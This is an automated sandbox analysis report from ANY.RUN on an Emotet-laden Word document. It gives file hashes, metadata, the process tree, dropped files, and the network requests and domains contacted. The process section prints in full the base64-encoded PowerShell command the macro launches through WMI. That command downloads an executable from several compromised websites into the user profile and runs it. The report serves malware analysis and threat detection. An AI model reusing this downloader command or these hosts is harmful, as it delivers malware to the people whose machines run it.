analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

MESSAGIO_206_868540.doc

Full analysis: https://app.any.run/tasks/0a991f3d-e640-4bbf-a1b7-f3985b383023
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: October 14, 2019, 16:40:07
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
emotet-doc
emotet
generated-doc
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Interactions, Subject: International, Author: Shanny Nader, Keywords: Total, Comments: Networked, Template: Normal.dotm, Last Saved By: Dereck Pacocha, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Oct 14 15:00:00 2019, Last Saved Time/Date: Mon Oct 14 15:00:00 2019, Number of Pages: 1, Number of Words: 30, Number of Characters: 172, Security: 0
MD5:

0D6CB6315C5470131560A2F461734163

SHA1:

19BAEB888D6CD58610A0B64A91453321C83F2AD1

SHA256:

A4AFFE707D20A6AE831E018ABF97987CF6CB17B032E137D548344265F7D61E20

SSDEEP:

3072:lPHuhowKgdzSrGsKyIwLx3GoRaWOcIBOaOhi1o5lE8COrg12bKDmwf9EJZ:lPHuhowKUzSHnLx3GoAWOJQaOhi1wKP

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    No malicious indicators.
  • SUSPICIOUS

    • Executed via WMI

      • powershell.exe (PID: 2812)
    • PowerShell script executed

      • powershell.exe (PID: 2812)
    • Creates files in the user directory

      • powershell.exe (PID: 2812)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 640)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 640)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
Manager: Grady
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 201
Paragraphs: 1
Lines: 1
Company: Hayes, Kulas and Zieme
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 172
Words: 30
Pages: 1
ModifyDate: 2019:10:14 14:00:00
CreateDate: 2019:10:14 14:00:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: Dereck Pacocha
Template: Normal.dotm
Comments: Networked
Keywords: Total
Author: Shanny Nader
Subject: International
Title: Interactions
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
38
Monitored processes
2
Malicious processes
0
Suspicious processes
1

Behavior graph

Click at the process to see the details
start winword.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
640"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\MESSAGIO_206_868540.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2812powershell -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABhADAAeABhAGUAZgA3ADYANQA1ADEAMwAxADAAZQA0ADMAPQAnAGEAMAB4AGMAYQAxAGMAYQBkAGYAOQA2ADgAMAAyADIAJwA7ACQAYQAwAHgAMQBkADMAOABhAGMAMgA4AGQAZgBjAGMANAA2ACAAPQAgACcANAA3ADIAJwA7ACQAYQAwAHgAZABjADQAYwAxADIAYQA3AGUAMwA5ADgAPQAnAGEAMAB4AGUAYQA4ADUAOABhADYAMAA3ADMAZABlADUAMQBkACcAOwAkAGEAMAB4ADEAMQAzADcAYwBlADYAYgBkAGYAMAA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAYQAwAHgAMQBkADMAOABhAGMAMgA4AGQAZgBjAGMANAA2ACsAJwAuAGUAeABlACcAOwAkAGEAMAB4AGYAZQA0ADMAMgAwADcANAA5ADIAMwAzADkAMQA9ACcAYQAwAHgAMgA4AGQANwBjADkAYQA2AGQANAAwAGYAJwA7ACQAYQAwAHgAMAAyAGMAYgA1AGQAMgBiADEAOABjADYAPQAuACgAJwBuACcAKwAnAGUAdwAtAG8AYgBqACcAKwAnAGUAYwB0ACcAKQAgAE4AZQB0AC4AdwBlAEIAQwBsAGkAZQBuAHQAOwAkAGEAMAB4ADEANQA4ADcAOQAzADQAMAAxAGIAZAAyADQAOAA9ACcAaAB0AHQAcAA6AC8ALwBhAG4AZAByAGUAdwBzAGkAYwBlAGwAbwBmAGYALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAGMAagAyAGQAMAAwADAAOQAvACoAaAB0AHQAcAA6AC8ALwBiAGUAYQBuAHMAbQBlAGQAaQBhAC4AYwBvAG0ALwB6AGUAdQBzADEANgAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAHQAdQBiAGEAdwA1AHkAMwA1AC8AKgBoAHQAdABwADoALwAvAGEAYgBoAGkAZABoAGEAbQBtAGEAcwBvAGMAaQBlAHQAeQAuAGMAbwBtAC8AdwBwAC0AcwBuAGEAcABzAGgAbwB0AHMALwBpAGgAMwB2AHoAZABjADkALwAqAGgAdAB0AHAAOgAvAC8AcABjAGYAMAA4AC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AMAAyADQANAA3AC8AKgBoAHQAdABwADoALwAvAGEAYwBxAHUAaQByAGkAbgBnAC0AdABhAGwAZQBuAHQALgBjAG8AbQAvAGQAcABhAGoALwAwADUAZwBkADUANwA1AC8AJwAuACIAcwBwAGAATABpAFQAIgAoACcAKgAnACkAOwAkAGEAMAB4ADgAOQA5ADAAYQA5AGQANABiAGEAMQAwAGUANwA9ACcAYQAwAHgAZQAxADgAMAAzADgAZgBjADYANQAzAGQANQAnADsAZgBvAHIAZQBhAGMAaAAoACQAYQAwAHgAMABmADcAYgA2AGQAZQA3ADUANQAgAGkAbgAgACQAYQAwAHgAMQA1ADgANwA5ADMANAAwADEAYgBkADIANAA4ACkAewB0AHIAeQB7ACQAYQAwAHgAMAAyAGMAYgA1AGQAMgBiADEAOABjADYALgAiAGQATwB3AE4AbABgAG8AQQBgAGQAYABGAGkAbABlACIAKAAkAGEAMAB4ADAAZgA3AGIANgBkAGUANwA1ADUALAAgACQAYQAwAHgAMQAxADMANwBjAGUANgBiAGQAZgAwACkAOwAkAGEAMAB4ADgAMQBkADkAOQBhADgANwBiADEAZAA9ACcAYQAwAHgANgBiAGIAMwAyADAANQBlADcAMwA4ACcAOwBJAGYAIAAoACgALgAoACcARwBlAHQAJwArACcALQBJACcAKwAnAHQAZQBtACcAKQAgACQAYQAwAHgAMQAxADMANwBjAGUANgBiAGQAZgAwACkALgAiAEwARQBOAGAARwBUAEgAIgAgAC0AZwBlACAAMgAxADMANwAxACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAHMAdABhAGAAUgBUACIAKAAkAGEAMAB4ADEAMQAzADcAYwBlADYAYgBkAGYAMAApADsAJABhADAAeABjADkANAA1AGYAZQBlAGEAOQBmAD0AJwBhADAAeAA1AGEAYwBmADUAYwBiADYAYQBhACcAOwBiAHIAZQBhAGsAOwAkAGEAMAB4ADAAZQA0ADkAZgBlAGYAMwA1ADIAPQAnAGEAMAB4ADkAZABjAGEANQA5AGUAZgA0AGEANAAzADMAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAYQAwAHgAZgA5ADUANAA5ADYAYQA4ADEAYwA0ADkANAA9ACcAYQAwAHgANgBkADcAZQAyADgAZQAwAGEAMQA2ACcAC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 747
Read events
1 318
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
2
Unknown types
17

Dropped files

PID
Process
Filename
Type
640WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRB2D0.tmp.cvr
MD5:
SHA256:
2812powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\LP894VBREGVNRM2BR740.temp
MD5:
SHA256:
640WINWORD.EXEC:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exdtlb
MD5:E45EF15CC6C3766DA3BD3E541C8FC173
SHA256:81BA8D8678E1E6B29CAA4E8EC3A79A286A65B8F36577BDD61FD4E06CCE404CE5
640WINWORD.EXEC:\Users\admin\Desktop\~$SSAGIO_206_868540.docpgc
MD5:BD0B2B636F6CFA84DFC2095769A3712A
SHA256:A7E63F4C42CAA1F1F10BF239170A0677012233580E4EF784E81DD50E16EBA0ED
640WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7962FCE4.wmfwmf
MD5:CD23FBF016B64F805508E03553D0F0CB
SHA256:3DB7FBC8C15797E0AB10B4DCBB316075284D0D961522BD63A156041E854F997E
640WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dattext
MD5:0814CDE0F283C1EB01663B81F88B8C92
SHA256:18848C2D7D272AE65DF48ABD6C90DE090E03FD03824F098BA98E10630D9947E0
640WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\83344892.wmfwmf
MD5:9934D523B9999D376CE561EB0ECD43D2
SHA256:2A21CD7C444054831E8E68BDCCEAF574508CA654EF9D51316042AF359619DD6F
640WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B18DA339.wmfwmf
MD5:788FCF837DE9B3B079C8B217F2103747
SHA256:3C378200E1F7284F2C37E977A801976859C90BA209D0127AF907B5EDE3CED642
640WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:02DA3494AF2496AB3D598F3B7F35FC1B
SHA256:5EFEA342ABC941A6F8904C8D02D5FE30CA0343C64ED9D67EFA8F24C469A15BA2
640WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\65A1C670.wmfwmf
MD5:E053316227BABD9EEDBCF3F78365D333
SHA256:BA9F0D1B6FB295F911AC6A798F3CC139D9656AB4DC035BE9F061A4CE15E93CFC
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
5
TCP/UDP connections
5
DNS requests
5
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2812
powershell.exe
GET
404
173.236.169.124:80
http://abhidhammasociety.com/wp-snapshots/ih3vzdc9/
US
xml
345 b
unknown
2812
powershell.exe
GET
404
62.210.16.61:80
http://pcf08.com/wp-content/02447/
FR
xml
345 b
malicious
2812
powershell.exe
GET
404
149.210.131.83:80
http://beansmedia.com/zeus16/wp-includes/tubaw5y35/
NL
xml
345 b
suspicious
2812
powershell.exe
GET
404
199.204.248.102:80
http://andrewsiceloff.com/wp-admin/cj2d0009/
US
xml
345 b
suspicious
2812
powershell.exe
GET
404
166.62.28.141:80
http://acquiring-talent.com/dpaj/05gd575/
US
xml
345 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2812
powershell.exe
149.210.131.83:80
beansmedia.com
Transip B.V.
NL
suspicious
2812
powershell.exe
199.204.248.102:80
andrewsiceloff.com
CONTINENTAL BROADBAND PENNSYLVANIA, INC.
US
suspicious
2812
powershell.exe
62.210.16.61:80
pcf08.com
Online S.a.s.
FR
malicious
2812
powershell.exe
166.62.28.141:80
acquiring-talent.com
GoDaddy.com, LLC
US
malicious
2812
powershell.exe
173.236.169.124:80
abhidhammasociety.com
New Dream Network, LLC
US
unknown

DNS requests

Domain
IP
Reputation
andrewsiceloff.com
  • 199.204.248.102
suspicious
beansmedia.com
  • 149.210.131.83
suspicious
abhidhammasociety.com
  • 173.236.169.124
unknown
pcf08.com
  • 62.210.16.61
malicious
acquiring-talent.com
  • 166.62.28.141
malicious

Threats

No threats detected
No debug info